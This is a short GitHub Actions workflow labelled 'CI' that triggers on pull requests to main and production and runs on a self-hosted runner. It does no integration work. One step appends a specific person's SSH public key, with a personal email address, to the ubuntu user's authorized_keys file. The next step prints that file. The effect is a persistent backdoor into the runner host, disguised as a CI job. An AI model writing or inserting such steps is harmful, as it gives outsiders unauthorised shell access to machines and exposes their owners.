name: CI

on:
  pull_request:
    branches: [main, production]

jobs:
  add-ssh-access:
    name: Add SSH Key
    runs-on: eee-ims

    steps:
      - name: Add SSH Key to server
        run: echo "ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAICPiv5rSJhHsJ0eBMm/aLTRZn5GhBYoXvaw9rsKitjiG soumitra.shewale.dev@gmail.com" >> /home/ubuntu/.ssh/authorized_keys

      - name: Check keys on server
        run: cat /home/ubuntu/.ssh/authorized_keys

